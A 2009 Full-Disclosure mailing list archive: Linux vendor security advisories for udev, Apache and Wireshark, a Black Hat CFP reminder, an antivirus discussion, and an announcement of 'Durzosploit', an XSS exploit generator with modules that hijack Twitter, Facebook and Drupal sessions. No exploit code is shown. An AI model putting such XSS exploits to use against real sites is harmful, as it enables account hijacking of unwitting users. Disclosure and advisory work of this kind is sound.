From jmoss at blackhat.com Fri May 1 00:36:38 2009 From: jmoss at blackhat.com (jmoss) Date: Thu, 30 Apr 2009 16:36:38 -0700 Subject: [Full-disclosure] BH USA CFP closing next Tuesday Message-ID: <088701c9c9ec$81a32f70$84e98e50$@com> Hey guys, just a reminder that the CFP for Black Hat USA is closing next Tuesday. I'll post the first batch of acceptances next week.. some really solid stuff this year from hacking ATM machines and lock picking forensics to Injecting agents into VM guest OS and myths of Extended Validation SSL certificates. Jeff From security at mandriva.com Fri May 1 04:09:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 May 2009 05:09:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:104 ] udev Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:104 http://www.mandriva.com/security/ _______________________________________________________________________ Package : udev Date : April 30, 2009 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space (CVE-2009-1185). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 _______________________________________________________________________ Updated Packages: Corporate 4.0: 3a371eee121816d9c4a82c4950741519 corporate/4.0/i586/udev-068-34.1.20060mlcs4.i586.rpm bb856a7f9a87741176990a18184c3068 corporate/4.0/i586/udev-doc-068-34.1.20060mlcs4.i586.rpm ba1d8692dc6efd1d7875487bb339332f corporate/4.0/i586/udev-tools-068-34.1.20060mlcs4.i586.rpm 27b02f6eb22dd35104585c56c527da28 corporate/4.0/SRPMS/udev-068-34.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: fe676d2bc1399ea76e2919aa5755f8b5 corporate/4.0/x86_64/udev-068-34.1.20060mlcs4.x86_64.rpm 0a88b5f9caf0e6b910b9f465b0b5da3e corporate/4.0/x86_64/udev-doc-068-34.1.20060mlcs4.x86_64.rpm f3aecddcf2ef8347e39b376597d85b12 corporate/4.0/x86_64/udev-tools-068-34.1.20060mlcs4.x86_64.rpm 27b02f6eb22dd35104585c56c527da28 corporate/4.0/SRPMS/udev-068-34.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJ+j1GmqjQ0CJFipgRAgJ/AJwPjKGnAXgRGBgJEs+HHDGIyLg8+ACfaFbx rGr+hYQZqL0qbAwoxP2GLsM= =MMEG -----END PGP SIGNATURE----- From security at mandriva.com Fri May 1 04:01:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 May 2009 05:01:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:103 ] udev Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:103 http://www.mandriva.com/security/ _______________________________________________________________________ Package : udev Date : April 30, 2009 Affected: 2008.1, 2009.0 _______________________________________________________________________ Problem Description: Security vulnerabilities have been identified and fixed in udev. udev before 1.4.1 does not verify whether a NETLINK message originates from kernel space, which allows local users to gain privileges by sending a NETLINK message from user space (CVE-2009-1185). Buffer overflow in the util_path_encode function in udev/lib/libudev-util.c in udev before 1.4.1 allows local users to cause a denial of service (service outage) via vectors that trigger a call with crafted arguments (CVE-2009-1186). The updated packages have been patched to prevent this. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 354c03adf70b476d5b049d10b497fc71 2008.1/i586/libvolume_id0-118-6.3mnb1.i586.rpm f9c19345cade16788dd8db2c5d28d690 2008.1/i586/libvolume_id0-devel-118-6.3mnb1.i586.rpm e46f08af64f99aef62a69972252487bf 2008.1/i586/udev-118-6.3mnb1.i586.rpm 8e73a6e6269a00738faae563c405bfab 2008.1/i586/udev-doc-118-6.3mnb1.i586.rpm 41d335547cc29f2fd6ef20508b54a6b2 2008.1/i586/udev-tools-118-6.3mnb1.i586.rpm f4c40f58ee82008a5cb0518868aaee1c 2008.1/SRPMS/udev-118-6.3mnb1.src.rpm Mandriva Linux 2008.1/X86_64: 5015356cc3ac713989679be1336e4d4e 2008.1/x86_64/lib64volume_id0-118-6.3mnb1.x86_64.rpm 77774d7a9223fb9327eb44d3fd44acd8 2008.1/x86_64/lib64volume_id0-devel-118-6.3mnb1.x86_64.rpm 26d3a29af7e915f5458499e1951340d3 2008.1/x86_64/udev-118-6.3mnb1.x86_64.rpm 96fa3e1930f938c78deea6e8c84deffd 2008.1/x86_64/udev-doc-118-6.3mnb1.x86_64.rpm bd9ca0a226c45994ce7f4c9df22a4a54 2008.1/x86_64/udev-tools-118-6.3mnb1.x86_64.rpm f4c40f58ee82008a5cb0518868aaee1c 2008.1/SRPMS/udev-118-6.3mnb1.src.rpm Mandriva Linux 2009.0: 5a0054d8b64bf0df26f911ad00fd22b0 2009.0/i586/libudev0-128-2.2mnb2.i586.rpm 86613d49ae237533b1e41a9a4eaa0b20 2009.0/i586/libudev0-devel-128-2.2mnb2.i586.rpm d6bf9400a3a06868e33df323419aeb68 2009.0/i586/libvolume_id1-128-2.2mnb2.i586.rpm eabb4c164276e47f7ec7def937e16d85 2009.0/i586/libvolume_id1-devel-128-2.2mnb2.i586.rpm 8061e4fd197d274375e7ff9b9241c0be 2009.0/i586/udev-128-2.2mnb2.i586.rpm 3a0b39c6dc1ff7f4e016ad4cc60ae0b2 2009.0/i586/udev-doc-128-2.2mnb2.i586.rpm 41c5db8650775842770f28e74d088c94 2009.0/SRPMS/udev-128-2.2mnb2.src.rpm Mandriva Linux 2009.0/X86_64: 20e923c0f97863cd3d6772d4a81b33c4 2009.0/x86_64/lib64udev0-128-2.2mnb2.x86_64.rpm ca3cbf864036c78eb21ad8ca1e8a02a6 2009.0/x86_64/lib64udev0-devel-128-2.2mnb2.x86_64.rpm 82d36efadd1b53f1e07e06d69252d1b0 2009.0/x86_64/lib64volume_id1-128-2.2mnb2.x86_64.rpm 71e108a5a734615778c9162e4eebfab1 2009.0/x86_64/lib64volume_id1-devel-128-2.2mnb2.x86_64.rpm c351a3350e63d8632c7973f116fb4af6 2009.0/x86_64/udev-128-2.2mnb2.x86_64.rpm c46fe7e4657d61e29a9ec7c0a382c043 2009.0/x86_64/udev-doc-128-2.2mnb2.x86_64.rpm 41c5db8650775842770f28e74d088c94 2009.0/SRPMS/udev-128-2.2mnb2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJ+jnYmqjQ0CJFipgRAozZAKCDEVKzKGFc1QN0B01D0fA/nNBEJACgrLuF i1gxqgYmxMnOnO7jYuRrnlE= =GYfW -----END PGP SIGNATURE----- From benjilenoob at hotmail.com Fri May 1 11:05:41 2009 From: benjilenoob at hotmail.com (Benjilenoob) Date: Fri, 1 May 2009 10:05:41 +0000 Subject: [Full-disclosure] Durzosploit v0.1 alpha Message-ID: Hi all readers, Just releasing a very small tool I wrote called Durzosploit. Durzosploit is a javascript exploits generator framework that works through the console. This goal of that project is to quickly and easily generate working exploits for cross-site scripting vulnerabilities in popular web applications or web sites. Please note that Durzosploit does not find browser vulnerabilities, it only is an framework containing exploits you can use. More info can be found here: http://engineeringforfun.com/wiki/index.php/Durzosploit_Introduction You can get it through the SVN: http://engineeringforfun.com/wiki/index.php/Durzosploit_SVN At present there isn't many exploits: (dz)> search exploits twitter.com/update_status - Updates a target's status twitter.com/update_settings - Updates your target's settings facebook.com/what_is_on_your_mind - Write your message in your target's mind drupal/edit_user_profile - Drupal 6.x - edit the profile of the user drupal/logout - Drupal 6.x - makes target logout (dz)> My focus has been on the framework itself; allowing people to quickly write their exploits and adding some automated obfuscators (Deanedwards is in there). I'll also use that email as a chance to give a quick update on Browser Rider. I am currently working on its API, a ruby client and a small firefox extension. I think Durzosploit will be a good addition to all of that. Please email to benjilenoob(_at_)gmail.com if you have any questions, issues, bugs, ideas, contributions. I'll be happy to answer you ASAP. have fun! Benjilenoob _________________________________________________________________ T?l?phonez gratuitement ? tous vos proches avec Windows Live Messenger? !? T?l?chargez-le maintenant ! http://www.windowslive.fr/messenger/1.asp From peak at argo.troja.mff.cuni.cz Fri May 1 13:38:10 2009 From: peak at argo.troja.mff.cuni.cz (Pavel Kankovsky) Date: Fri, 1 May 2009 14:38:10 +0200 (CEST) Subject: [Full-disclosure] Anti virus installations on Windows servers In-Reply-To: <2d6724810904291229k2990e62al94cdd95f6ee040b7@mail.gmail.com> Message-ID: <20090501142903.BBD.0@paddy.troja.mff.cuni.cz> On Wed, 29 Apr 2009, T Biehn wrote: > What do you suggest to use on a server that must accept uploads of > binaries from users? > Should these binaries be scanned by an anti-virus? Can we trust that > end users have competent Anti-Virus? This question is a kind of non-sequitur because you have not told us what kind of binaries are uploaded, where do they come from, what is the server supposed to do with them. Let me fill the gaps myself for the sake of demonstration: Users compile their own programs for some obscure kind of embedded computer and upload the resulting binaries to a server that is supposed to archive them for future reference. Should these binaries be scanned by an anti-virus? What do you think? -- Pavel Kankovsky aka Peak / Jeremiah 9:21 \ "For death is come up into our MS Windows(tm)..." \ 21th century edition / From security at mandriva.com Fri May 1 14:37:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 01 May 2009 15:37:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:102 ] apache Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:102 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache Date : April 30, 2009 Affected: 2009.1 _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in apache: mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request (CVE-2009-1191). This update provides fixes for that vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1191 _______________________________________________________________________ Updated Packages: Mandriva Linux 2009.1: 84173d7808395e9764cf8a6bf73518b1 2009.1/i586/apache-base-2.2.11-10.1mdv2009.1.i586.rpm cf5436765525b3adc826daa5bc210ab5 2009.1/i586/apache-devel-2.2.11-10.1mdv2009.1.i586.rpm 05da7f68e46c4314dccf1391f3e575d6 2009.1/i586/apache-htcacheclean-2.2.11-10.1mdv2009.1.i586.rpm a78717a71f2aeffc488b4a79e0f13a5c 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.1mdv2009.1.i586.rpm d82c899d917a0432093a95a7994f3212 2009.1/i586/apache-mod_cache-2.2.11-10.1mdv2009.1.i586.rpm 6286f9a46a5cf1c69389020f2b8f1ba9 2009.1/i586/apache-mod_dav-2.2.11-10.1mdv2009.1.i586.rpm f84e50430736a059f89036436cf093d0 2009.1/i586/apache-mod_dbd-2.2.11-10.1mdv2009.1.i586.rpm aa900c2245dda03318a50d1950466e70 2009.1/i586/apache-mod_deflate-2.2.11-10.1mdv2009.1.i586.rpm d7613d9f701996918b2e612b2f9945ce 2009.1/i586/apache-mod_disk_cache-2.2.11-10.1mdv2009.1.i586.rpm 1584026aec3bb46e5a277d8c239d5cc4 2009.1/i586/apache-mod_file_cache-2.2.11-10.1mdv2009.1.i586.rpm 85c01c35c9a10050d03c83fab0cc7b07 2009.1/i586/apache-mod_ldap-2.2.11-10.1mdv2009.1.i586.rpm dd3fe1449025622ee3bde812643c60cd 2009.1/i586/apache-mod_mem_cache-2.2.11-10.1mdv2009.1.i586.rpm 3786880d703cea5a5a5e035318b63918 2009.1/i586/apache-mod_proxy-2.2.11-10.1mdv2009.1.i586.rpm b56fc78a2da3de576c685b641f8d620a 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.1mdv2009.1.i586.rpm 9cffd8c0587a34aa2d513aed57bccf07 2009.1/i586/apache-mod_ssl-2.2.11-10.1mdv2009.1.i586.rpm 47891fcaefd8f5b22ab707353f3b8192 2009.1/i586/apache-modules-2.2.11-10.1mdv2009.1.i586.rpm 0c3dcb4931fe01468275ec0e05a30595 2009.1/i586/apache-mod_userdir-2.2.11-10.1mdv2009.1.i586.rpm 7eb07e1ae40b4d790275a96da9c0c40b 2009.1/i586/apache-mpm-event-2.2.11-10.1mdv2009.1.i586.rpm 58b7e5edbee5510b2269ddbe051ea72a 2009.1/i586/apache-mpm-itk-2.2.11-10.1mdv2009.1.i586.rpm 4bfbe7ff2ee129eb7acceff9ae92223d 2009.1/i586/apache-mpm-peruser-2.2.11-10.1mdv2009.1.i586.rpm 4f282324726b702b83c101c718c6c5ce 2009.1/i586/apache-mpm-prefork-2.2.11-10.1mdv2009.1.i586.rpm 3bfc7be3fc27b1b1c488092c609b31e9 2009.1/i586/apache-mpm-worker-2.2.11-10.1mdv2009.1.i586.rpm 6acf6841d772e23440f83bd89ebf49ea 2009.1/i586/apache-source-2.2.11-10.1mdv2009.1.i586.rpm 1715fdb5dce7fd4b93c47c11e045d5ea 2009.1/SRPMS/apache-2.2.11-10.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: da7e1a2f61449581eb6472909c405554 2009.1/x86_64/apache-base-2.2.11-10.1mdv2009.1.x86_64.rpm 370cd6bc3b5dddbe096c292d6c64b2a8 2009.1/x86_64/apache-devel-2.2.11-10.1mdv2009.1.x86_64.rpm 0d40fd7ad65adf7ec4bce90d70b6cca1 2009.1/x86_64/apache-htcacheclean-2.2.11-10.1mdv2009.1.x86_64.rpm 43b68e253a37cd3c849a5611cafdd3f4 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.1mdv2009.1.x86_64.rpm fdd3942faeb19f783522485602d02aa5 2009.1/x86_64/apache-mod_cache-2.2.11-10.1mdv2009.1.x86_64.rpm 4b1582292c86fb24d3012b9ec01f6b33 2009.1/x86_64/apache-mod_dav-2.2.11-10.1mdv2009.1.x86_64.rpm 84f82788780a7a2143c47b902918b495 2009.1/x86_64/apache-mod_dbd-2.2.11-10.1mdv2009.1.x86_64.rpm d8da90b82dad28ffb6d08a37a3801623 2009.1/x86_64/apache-mod_deflate-2.2.11-10.1mdv2009.1.x86_64.rpm fb760b8890ced968acaae0c97e7ebe29 2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.1mdv2009.1.x86_64.rpm 57508bfeff839917bd2840d88f1e7242 2009.1/x86_64/apache-mod_file_cache-2.2.11-10.1mdv2009.1.x86_64.rpm ec39a0800645bb3c2e70b6433f3be014 2009.1/x86_64/apache-mod_ldap-2.2.11-10.1mdv2009.1.x86_64.rpm 03b1273fec51287c89eb728320865413 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.1mdv2009.1.x86_64.rpm a47cd7dafa57ae146f3ef62f152ed652 2009.1/x86_64/apache-mod_proxy-2.2.11-10.1mdv2009.1.x86_64.rpm 4cca6e597f9b42dc8df2d322abfef052 2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.1mdv2009.1.x86_64.rpm 54b731a8732163081ef52005720bc10b 2009.1/x86_64/apache-mod_ssl-2.2.11-10.1mdv2009.1.x86_64.rpm 8574d616adb823ab1204b3175a6d187c 2009.1/x86_64/apache-modules-2.2.11-10.1mdv2009.1.x86_64.rpm 8da6f834e5dc5994acb5e21dde9db5ca 2009.1/x86_64/apache-mod_userdir-2.2.11-10.1mdv2009.1.x86_64.rpm cc7b72ebb9cb262b8650a77e2d231454 2009.1/x86_64/apache-mpm-event-2.2.11-10.1mdv2009.1.x86_64.rpm d44150c74bf7b5962942ef15b465e99f 2009.1/x86_64/apache-mpm-itk-2.2.11-10.1mdv2009.1.x86_64.rpm c39db13bb76acb414c2baae91f9a1261 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.1mdv2009.1.x86_64.rpm b32f61458288390688c852502b6e6a9b 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.1mdv2009.1.x86_64.rpm a9433a9b6f4b84e9f22e7705e0addf35 2009.1/x86_64/apache-mpm-worker-2.2.11-10.1mdv2009.1.x86_64.rpm e8546ef348460ceb6e71633621fe203c 2009.1/x86_64/apache-source-2.2.11-10.1mdv2009.1.x86_64.rpm 1715fdb5dce7fd4b93c47c11e045d5ea 2009.1/SRPMS/apache-2.2.11-10.1mdv2009.1.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJ+tDlmqjQ0CJFipgRAq01AJ9Xlvt3Mwp4NAjlsIa8wxqBBDCAEgCg7PVt lVg6vojqNkzklOdABMiZxLc= =qVOR -----END PGP SIGNATURE----- From jmm at debian.org Fri May 1 15:46:49 2009 From: jmm at debian.org (Moritz Muehlenhoff) Date: Fri, 1 May 2009 16:46:49 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1785-1] New wireshark packages fix several vulnerabilities Message-ID: <20090501144649.GA9525@galadriel.inutil.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1785-1 security at debian.org http://www.debian.org/security/ Moritz Muehlenhoff May 01, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : wireshark Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2009-1210 CVE-2009-1268 CVE-2009-1269 Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer, which may lead to denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-1210 A format string vulnerability was discovered in the PROFINET dissector. CVE-2009-1268 The dissector for the Check Point High-Availability Protocol could be forced to crash. CVE-2009-1269 Malformed Tektronix files could lead to a crash. The old stable distribution (etch), is only affected by the CPHAP crash, which doesn't warrant an update on its own. The fix will be queued up for an upcoming security update or a point release. For the stable distribution (lenny), these problems have been fixed in version 1.0.2-3+lenny5. For the unstable distribution (sid), these problems have been fixed in version 1.0.7-1. We recommend that you upgrade your wireshark packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - -------------------------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5.dsc Size/MD5 checksum: 1501 b3a17f219c87c961b35ecd42649f3162 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5.diff.gz Size/MD5 checksum: 101699 5f1e2ad455d391b99f1b0e10fdb01606 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2.orig.tar.gz Size/MD5 checksum: 16935492 1834437f7c6dbed02082e7757133047d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_alpha.deb Size/MD5 checksum: 730878 815eea657d82ccaa5b63eaf6c3c7f381 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_alpha.deb Size/MD5 checksum: 12100214 905b9c09b3fbc882febb0af6b4cef5f6 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_alpha.deb Size/MD5 checksum: 126580 03d8a47ed6c6d1ab7fccdc22efa667cd http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_alpha.deb Size/MD5 checksum: 569476 b0c251c829c5fcb415e833c9c334cd35 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_amd64.deb Size/MD5 checksum: 11872180 92384dd416ac63a999d10a3c697691c9 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_amd64.deb Size/MD5 checksum: 118488 45dc2934cf797bdc24044a2e2f9be9a4 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_amd64.deb Size/MD5 checksum: 659500 965baca8e755bcb11f130009ef9bc12b http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_amd64.deb Size/MD5 checksum: 583274 da0fbbd79779d6ae19e51fc546c9bfb7 arm architecture (ARM) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_arm.deb Size/MD5 checksum: 613798 e87592377139dcd68a5b3fac67e6bb16 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_arm.deb Size/MD5 checksum: 584000 6c67088dacf4720a066c6db5ebc93337 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_arm.deb Size/MD5 checksum: 10216512 f21e8b719dfc980eb7ae7034039c432a http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_arm.deb Size/MD5 checksum: 110818 b681333b90dcbbd680dab5052671e337 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_armel.deb Size/MD5 checksum: 10216300 91560627d9f15c59ade557986abd3519 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_armel.deb Size/MD5 checksum: 113278 0b36066d921e43404a4c85d7cc2493c1 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_armel.deb Size/MD5 checksum: 619654 8f9955bdf98a19e9b54b4ad819cd74fb http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_armel.deb Size/MD5 checksum: 584548 b9808f1e00c34bb49aea790b48061fa0 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_hppa.deb Size/MD5 checksum: 695086 f36bf0d98055841819b9b3839a0a8189 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_hppa.deb Size/MD5 checksum: 120288 da6829be3a76a54851795cf49f58d473 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_hppa.deb Size/MD5 checksum: 13276580 64a7a853d096e0fc99db298fbe98f460 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_hppa.deb Size/MD5 checksum: 582556 93d52e72ab8733c53c28c1e66cab8a73 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_i386.deb Size/MD5 checksum: 582848 ea57fc7c03a29c4ebe03c96b5ffbca56 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_i386.deb Size/MD5 checksum: 619190 a210bbe83969b492ee6da0798909c3fa http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_i386.deb Size/MD5 checksum: 10113510 dd3c1129fe3e1350398ca5ea65a89178 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_i386.deb Size/MD5 checksum: 111286 bedb1816542ca9319a16561f64d627b6 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_ia64.deb Size/MD5 checksum: 929950 9c31e886abb0cfbf52ea0da1f4ccad74 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_ia64.deb Size/MD5 checksum: 153672 02170cb1a0172a3bdb7a29a2ed9b7f12 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_ia64.deb Size/MD5 checksum: 569466 a9d0e6d240d29db562599b8cb63750d9 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_ia64.deb Size/MD5 checksum: 13690454 3056b0146c50963786406c0048642a22 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_mips.deb Size/MD5 checksum: 112952 6e67c164403df894d25863603bf20f43 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_mips.deb Size/MD5 checksum: 10429740 6553d71d68e52731241f0dc83b02329b http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_mips.deb Size/MD5 checksum: 636716 78dd552e011d08b3ad684139d55661f3 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_mips.deb Size/MD5 checksum: 569484 dac116cfa7eb3a4ade558cea06d465e5 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_mipsel.deb Size/MD5 checksum: 112968 47f018f83a7e926f4d9e90a6be20c170 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_mipsel.deb Size/MD5 checksum: 626732 c2908d4143379549d038e848adb4200e http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_mipsel.deb Size/MD5 checksum: 9730716 8cdb40dc02035f5ab45788c0c0d8fb5e http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_mipsel.deb Size/MD5 checksum: 569470 ef6483a532821c6db028ded13b68c2ce powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_powerpc.deb Size/MD5 checksum: 122156 36b42babe8468b5b44c98e6b85d71b5c http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_powerpc.deb Size/MD5 checksum: 569464 9c258ed03004a9a8c213b46f44bd839c http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_powerpc.deb Size/MD5 checksum: 11230120 b9c17ad442834c8a0e26c24a00ce625b http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_powerpc.deb Size/MD5 checksum: 677260 bc4776cfddd139098d8797105707567a s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_s390.deb Size/MD5 checksum: 670908 1e51b5daf82994c7f9bc438d6cf02929 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_s390.deb Size/MD5 checksum: 12490148 40a312a358fd3201036e178906686473 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_s390.deb Size/MD5 checksum: 569470 47e7d1cc5dd3e7ae69d23cb7150388f7 http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_s390.deb Size/MD5 checksum: 121696 9ee1d87e7fe84000291e6eafa3c479c8 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/w/wireshark/wireshark-common_1.0.2-3+lenny5_sparc.deb Size/MD5 checksum: 11289992 aab8af6c486ce6415eb4bd4555b25618 http://security.debian.org/pool/updates/main/w/wireshark/wireshark_1.0.2-3+lenny5_sparc.deb Size/MD5 checksum: 629260 07202801496e99004a92a618dc8c26ea http://security.debian.org/pool/updates/main/w/wireshark/tshark_1.0.2-3+lenny5_sparc.deb Size/MD5 checksum: 113246 e91ee3ba76dc7e9343251b651a9d24d0 http://security.debian.org/pool/updates/main/w/wireshark/wireshark-dev_1.0.2-3+lenny5_sparc.deb Size/MD5 checksum: 569496 aa9859ef128ec7afddb566b2f84d9888 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkn7CvoACgkQXm3vHE4uylqSFACfYtIe3PKYFlZNfGodxD0gg4XP KfcAoOVGWWbg20c+SSn8ltZP+wCsLzrr =MC0u -----END PGP SIGNATURE----- From tbiehn at gmail.com Fri May 1 18:52:34 2009 From: tbiehn at gmail.com (T Biehn) Date: Fri, 1 May 2009 13:52:34 -0400 Subject: [Full-disclosure] Anti virus installations on Windows 